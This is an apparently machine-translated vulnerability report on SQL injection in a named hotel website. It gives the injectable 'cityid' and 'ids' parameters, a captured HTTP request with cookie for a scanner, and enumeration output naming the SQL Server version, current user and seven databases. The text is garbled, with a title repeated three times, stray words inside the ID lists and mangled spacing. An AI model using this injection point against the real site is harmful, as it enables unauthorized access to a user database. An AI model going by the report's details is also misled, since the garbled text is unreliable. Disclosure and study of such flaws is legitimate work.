The SQL injection vulnerability on a website affects the user database again.

The SQL injection vulnerability on a website affects the user database again.

The SQL injection vulnerability on a website affects the user database again.

Where is the http://hotels.yonyou.com/hotelmaplist/index.html? Cityid = 0101 & h = 340 & ids = 17996,129696, clerk, 126559,124890, clerk, clerk, 128908,145772, 146286,146180, 17995 & juli = & px = 3 & w = 760 parameter: cityidids


Take cityid as an example: Packet Capture is required to run:
GET/javasmaplist/index.html? Cityid = 0101 & h = 340 & ids = 17996,129696, expires, 126559,124890, expires, expires, 128908,145772, 146286,146180, 17995 & juli = & px = 3 & w = 760 HTTP/1.1
Host: hotels.yonyou.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 37.0) Gecko/20100101 Firefox/37.0
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: zh-CN, zh; q = 0.8, en-US; q = 0.5, en; q = 0.3
Accept-Encoding: gzip, deflate
Cookie: signature = a % 3A5% 3A % 7Bs % 3A10% 3A % 22session_id % 22% 3Bs % 3A32% 3A % signature % 22% 3Bs % 3A10% 3A % 22ip_address % 22% 3Bs % 3A13% 3A % 22192.168.0.125% 22% 3Bs % 3A10% 3A % 22user_agent % 22% 3Bs % 3A72% 3A % 22 Mozilla % 2F5. 0 + % 28 Windows + NT + 6.1% 3B + WOW64 % 3B + rv % 3A37. 0% 29 + Gecko % 2F20100101 + Firefox % 2F37. 0% 22% 3Bs % 3A13% 3A % 22last_activity % 22% 3Bi % 3A1429668080% 3Bs % 3A9% 3A % 22user_data % 22% 3Bs % 3A0% 3A % 22% 3B % timeout
X-Forwarded-For: 8.8.8.8
Connection: keep-alive




Back-end DBMS: Microsoft SQL Server 2008
Current user: 'user _ r_tianqiA'
Current database: 'Hotel _ 9tour_cn'
Available databases [7]:
[*] Pai_9tour_cn
[*] Pai_9tour_cn \ x03
[*] Master
[*] Model
[*] Msdb
[*] Tempdb
[*] Www_mapdata_com